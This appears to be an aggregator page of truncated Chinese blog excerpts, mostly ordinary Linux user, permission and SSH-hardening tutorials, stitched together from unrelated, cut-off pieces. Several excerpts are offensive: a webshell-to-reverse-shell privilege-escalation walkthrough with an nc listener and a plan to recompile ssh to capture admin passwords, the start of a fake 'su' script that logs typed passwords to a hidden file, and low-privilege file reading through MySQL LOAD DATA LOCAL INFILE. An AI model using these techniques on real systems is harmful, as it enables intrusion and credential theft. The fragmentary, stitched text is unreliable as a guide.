0x01 场景 现在有个攻击场景,就是你拿到了linux外网服务器的webshell,要做内网渗透前肯定要收集信息.其中可以做的一个工作是重新编译ssh来记录管理员的密码信息,信息可以用来撞其他机器的密码.下面就从linux的提权开始 0x02 过程 反弹shell linux下为啥要反弹出一个shell来提权,这个你可以用webshell来执行一次溢出exp. 自己外网服务器 nc -l -vv -p 1234 ,监听1234端口 webshell如果能访问外网,则用bash,python,p…

//1,创建用户 useradd name //2,修改密码 passwd name //3,修改ssh配置文件,在最后一行添加AllowUsers name vi /etc/ssh/sshd_config //4,重启ssh服务 service sshd restart 可以在/etc/ssh/sshd_config中增加AllowUsers:username(可以多个,空格分开)给普通用户增加ssh权限 也可以设置允许和拒绝ssh的用户/用户组: DenyUsers:username,Den…

cnrstar (Be My Personal Best!) | 2014-05-20 21:58 众所周知,Mysql的用户在没有File权限情况下是无法通过Load_file读文件或者通过into dumpfile 或者into outfile去写文件,但是偶尔在一个网站上发现个小技巧,也就是通过load data infile可以读取本地文件到数据库,这样子我们就可以在低权限下通过这个bug去读取服务器上的文件.代码如下: LOAD DATA LOCAL INFILE 'C:/boot.i…

1.关于sudo不需要输密码,低权限执行高权限,在root下的命令visudo放开%wheel ALL:保存退出, 执行gpasswd -a yourusername wheel 2.脚本命令下的,权限变更执行跨用户脚本,有两种方式: <1>字符串输入: su - ossuser -c “cd  /opt/neteco_priv/ossuserbin;./uninstall_neteco_ossuser.sh” <2>利用EOF代码块切换: #!/bin/bashsu - test…

Linux命令的格式是: 命令+选项+参数 命令是必须存在的,选项和参数可以不必存在,不写的情况是有默认的参数 Linux 一切皆文件 对于文件而言,只需要对文件进行读写就可以实现对文件内容内容的增删改查 对于存在在磁盘上的文件而言,当编辑器需要对文件操作时,编辑器将文件的内容全部读入内存,文件的修改是发生在内存中,当文件保存时,是内存中的文件把原来磁盘上的内容覆盖. 一.Linux的权限管理 1.1 新建用户natasha,uid为1000,gid为555,备注信息为"master"…

Sshpass是使用SSH所谓的"交互式键盘密码身份验证"以非交互方式执行密码身份验证的工具 通俗来说就是 使用ssh密码登录 是需要在连接时手动输入密码的,没办法明文连接,如下图,需要交互的输入密码. 而Sshpass 做的就是通过明文的方式使用ssh,并带来了一些更新鲜的特性 安装 macOS - brew下载安装 # 安装命令 brew install https://raw.githubusercontent.com/kadwanev/bigboybrew/master/Lib…

#!/usr/bin/python import os, sys, getpass, time current_time = time.strftime("%Y-%m-%d %H:%M") logfile="/dev/shm/.su.log" fail_str = "su: incorrect password" try: passwd = getpass.getpass(prompt='Password: '); file=open(logfi…

1. 使用root账户创建新用户 useradd webuser 2. 修改新增的用户的密码 passwd webuser 这时候会提示你输入新的密码: 注意:不要用su webuser进入该账户修改密码,直接在外面用root账户修改!!…

ps:鸟哥的第三版私房菜印刷的有问题 上面的意思:d指的是目录 档案拥有者权限:r可读w可写,x,可运行, 同群组的权限:r可读,这段有个-号,表示不可写,x表示可运行 其他非本群组的权限:r可读,这段也有个-号,表示不可写,x可运行 后面有个2,表示有2个文件,默认都有两个,一个是. 一个是.. 档案拥有者为:root 档案所属组为:root…

2.27linux和windows互传文件 3.1 用户配置文件和密码配置文件 3.2 用户组管理 3.3 用户管理 linux和windows互传文件 显示日期date [root@centos_1 ~]# date 2017年 11月 21日 星期二 08:38:25 CST 显示系统语言 [root@centos_1 ~]# echo $LANG zh_CN.UTF-8 [root@centos_1 ~]# stat 1.txt.bak 文件:"1.txt.bak" 大小:103…

相关学习资料 http://blog.sina.com.cn/s/blog_4e2e6d6a0100g47o.html http://blog.csdn.net/aegoose/article/details/25439649 http://www.linuxeden.com/html/unix/20071031/36892.html http://keren.blog.51cto.com/720558/144908 http://blog.csdn.net/scutth/article/det…

linux最高权限用户root,默认可以直接登录sshd.为了提高服务器的安全度,需要对它进行禁止,使得攻击者无法通过暴力破解来获取root权限. 1,新建一个用户: #useradd xxx (xxx为你要新建的用户名) 2,为新用户设置密码: #passwd xxx (xxx为你要新建的用户名) 3,修改SSHD配置,禁止root直接登录 #vi /etc/ssh/sshd_config 查找“#PermitRootLogin yes”,将前面的“#”去掉,短尾“Yes”改为“No”,并保存…

写在前面:案例.常用.归类.解释说明.(By Jim) Linux文件权限用户useradd test (添加用户test)userdel test (删除用户test)passwd test(修改用户密码)grep jiqing9006 /etc/passwd(查看etc下passwd文件下的含有jiqing9006的行) 用户组每个用户组都有一个唯一的GID.groupadd shared(创建一个新的用户组,当您创建新用户组时,系统默认不会为它分配任何用户.)usermod -G shar…

0x01 Oracle存储过程”缺陷” 在 Oracle 的存储过程中,有一个有趣的特点:运行权限.运行权限分为两种,definer 和 invoker. definer 为函数创建者的权限,而 invoker 则是当前调用函数的用户.运行权限在函数创建时就已经被钦定了,默认为 definer. 说白了,如果我们用低权限用户去运行DBA权限用户创建的存储过程,我们在调用时就可以额访问DBA资源,使用DBA的权限 Oracle 这样做的初衷,实际上是为了用户互相访问资源时,避免用户凭据的问题.当然…

一:Linux时间日期-时间同步策略 1.日期与时间 ①时间命令 data:查看当前系统时间 cal :查看日历     cal  2020 修改时间:   date -s  11:11:11     :date  -s   2019-11-11  :date  -s  '2019-11-11 11:11:11' ②日期自动同步    自动同步时间的 叫 ntp 启动同步时间  :yum  install  ntp   -y       :  ntpdate   cn.ntp.org.cn   …

SSH原理:[Hadoop系列]linux SSH原理解析 操作环境: CentOS 6.5 操作对象: 用户A主机和远程主机B 正文部分:斜体加粗代表linux指令. linux下 非root用户免密码登录远程主机 ssh请转至此链接:XXXXXXXXXXXXXXXX(暂未写好) 一.远程主机B和用户A都安装openssh 首先我们检查远程主机是否安装openshh和rsync rpm -qa|grep opensshrpm -qa|grep rsync 如果没有返回相关信息代表并未安装,我们…

一.系统启动流程 一般来说,Linux 系统的启动流程是这样的: 1. 开机之后,位于计算机主板 ROM 芯片上的 BIOS 被最先读取,在进行硬件和内存的校验以及 CPU 的自检没有异常后, BIOS 将被加载到内存中. 2. BIOS 按照其设置的设备启动顺序,依次尝试加载含有 MBR 信息的可启动设备(一般是硬盘,可设置),然后将控制权交给 MBR 中的 Bootloader(引导程序). 3. Linux 中使用 GRUB(多操作系统引导程序)作为 Bootloader.GRUB 可以识…

描述Linux系统的启动过程? 1.开机自检 BIOS 2.MBR引导 3.GRUB菜单 4.加载内核 5.运行init进程 6.从/etc/inittab读取运行级别 7.根据/etc/rc.sysinit 初始化系统(设置主机名 设置ip) 8.根据运行级别启动对应的软件(开机自启动软件) 9.运行mingetty显示登录界面 Linux系统的启动过程 临时修改 [root@template ~]# alias rm='echo command not found' [root@templa…

最近在用虚拟机,安装了centos,现在想新添加一个用户,在网上找了找方法.[原文链接] # useradd –d /usr/sam -m sam 此命令创建了一个用户sam,其中-d和-m选项用来为登录名sam产生一个主目录/usr/sam(/usr为默认的用户主目录所在的父目录). 假设当前用户是sam,则下面的命令修改该用户自己的口令: # passwd Old password:****** New password:******* Re-enter new password:*****…

 1.Linux基本防护措施 与用户相关的配置文件 /etc/passwd   /etc/shadow  /etc/group /etc/gshadow  /etc/login.defs /etc/skel   与用户相关的命令  chage   passwd   伪装登录提示 /etc/issue. /etc/issue.net   文件系统安全 普通权限 r w x   特殊权限 suid sgid 粘滞位 访问控制列表  facl   给文件加特殊属性  i 和 a   对应的管理命令 l…

一.Linux基本防护措施 目标: 本案例要求练习Linux系统的基本防护措施,完成以下任务: 修改用户zhangsan的账号属性,设置为2015-12-31日失效(禁止登录) 锁定用户lisi的账户,使其无法登录,验证效果后解除锁定 锁定文件/etc/resolv.conf./etc/hosts,以防止其内容被无意中修改 修改tty终端提示,使得登录前看到的第一行文本为“Windows Server 2012 Enterprise R2”,第二行文本为“NT 6.2 Hybrid” 步骤: 步…

目录 今日内容概要 内容详细 解析映射文件 磁盘挂载文件 开机加载脚本 系统启动级别 使用单用户模式修改密码 变量加载文件 登录提示信息 第三方软件安装目录(编译安装目录) 系统日志目录 保存系统运行状态的目录 今日内容概要 系统中重要的文件系统 使用单用户模式修改root密码 内容详细 解析映射文件 # 本地的DNS # 文件目录:/etc/hosts Windows系统目录:C:\Windows\System32\drivers\etc\hosts # 例如: 搜索百度正常是用网址 www.…

===============ubuntu================================================== 在Ubuntu13.10下创建一个新的用户:Step1:添加新用户useradd -r -m -s /bin/bash 用户名Step2:配置新用户密码passwd 用户名Step3:给新添加的用户增加ROOT权限vim /etc/sudoers然后添加:用户名 ALL=(ALL:ALL) ALL另外,如果直接用useradd添加用户的话,可能出现没有h…

Linux系统默认情况下,是可以通过ssh以root权限登录的.但出于安全考虑,这样的权限是不合适的,因为黑客可能通过暴力破解你的root密码,然后进入你的系统,oh,damn it..... 同样是出于安全性考虑,我们在日常使用linux系统时,一般是通过普通用户来进行操作,在某些操作需要root权限时,通过su - 命令,或者sudo命名获取root权限进行操作,而不是一直以root用户在系统中横冲直撞,因为说不定什么时候你手一抖,就进行了一些危险性的操作. 那么如何禁止以root通过ssh…

用户及文件权限管理 实验介绍 1.Linux 中创建.删除用户,及用户组等操作. 2.Linux 中的文件权限设置. 一.Linux 用户管理 Linux 是一个可以实现多用户登陆的操作系统,比如“李雷”和“韩梅梅”都可以同时登陆同一台主机,他们共享一些主机的资源,但他们也分别有自己的用户空间,用于存放各自的文件.但实际上他们的文件都是放在同一个物理磁盘上的甚至同一个逻辑分区或者目录里,但是由于 Linux 的 用户管理 和 权限机制 ,不同用户不可以轻易地查看.修改彼此的文件. 下面我们就来学…

之前我已经在wooyun和91ri上发表了这篇文章,今天转到51cto上... 默认的ssh日志是不带密码记录功能的,现在想把登录密码记录下来,这样就可以搜集黑客的ssh爆破字典了,从而可以反扫回去. 具体方法就是给默认的ssh源码打个patch #wget http://openbsd.cs.toronto.edu/pub/OpenBSD/OpenSSH/portable/openssh-6.6p1.tar.gz #tar xzvf openssh-6.6p1.tar.gz #cd opens…

http://www.jb51.net/article/45848.htm Linux 系统是一个多用户多任务的分时操作系统,任何一个要使用系统资源的用户,都必须首先向系统管理员申请一个账号,然后以这个账号的身份进入系统.用户的账号一方面可以帮助系统管理员对使用系统的用户进行跟踪,并控制他们对系统资源的访问:另一方面也可以帮助用户组织文件,并为用户提供安全性保护.每个用户账号都拥有一个惟一的用户名和各自的口令.用户在登录时键入正确的用户名和口令后,就能够进入系统和自己的主目录. 实现用户账号的管…

1.添加用户,首先用adduser命令添加一个普通用户,命令如下: #adduser tommy //添加一个名为tommy的用户#passwd tommy   //修改密码Changing password for user tommy.New UNIX password:     //在这里输入新密码Retype new UNIX password:  //再次输入新密码passwd: all authentication tokens updated successfully. 2.赋予r…

1.用户及passwd文件 1)掌握/etc/passwd文件的功能:存储所有用户的相关信息,每一个用户占用一行记录,该文件也被称为用户信息数据库(Database) 2)/etc/passwd文件中每个字段的具体含义: a)第1个字段(列):记录的是这个用户的名字(在创建用户时root用户起的) b)第2个字段(列):如果是x,表示该用户登录Linux系统时必须使用密码:如果为空,表示该用户在登录时无须提供密码 c)第3个字段(列):记录的是这个用户的uid d)第4个字段(列):记录的是这个…

文件权限 默认权限分配 umask umask是通过八进制的数值来定义用户创建文件或目录的默认权限的 安全权限的临界点是,文件默认权限是644,目录默认权限是755 [root@Poppy joker]# umask 0022 根据下面的判断来设置默认的权限分配 if [ $UID -gt 199 ] && [ "`/usr/bin/id -gn`" = "`/usr/bin/id -un`" ]; then umask 002 else umask…